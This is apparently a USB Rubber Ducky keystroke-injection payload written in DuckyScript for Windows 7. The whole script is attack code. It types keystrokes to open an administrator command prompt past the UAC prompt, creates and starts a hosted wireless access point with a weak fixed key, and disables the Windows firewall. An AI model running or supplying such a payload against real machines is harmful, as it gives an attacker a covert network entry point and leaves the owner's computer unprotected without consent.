Author: Darren Kitchen
Duckencoder: 1.0
Target: Windows 7
Description: Open a CMD bypassing UAC then create a wireless access point with the SSID noobcake and WPA key 123456789, then lower firewall.
 CONTROL ESCAPE
 DELAY 200
 STRING cmd
 DELAY 200
 MENU
 DELAY 100
 STRING a
 DELAY 100
 LEFTARROW
 ENTER
 DELAY 200
 STRING netsh wlan set hostednetwork mode=allow ssid=noobcake key=123456789
 ENTER
 DELAY 100
 STRING netsh wlan start hostednetwork
 ENTER
 DELAY 100
 STRING netsh firewall set opmode disable
 ENTER
 STRING exit
 ENTER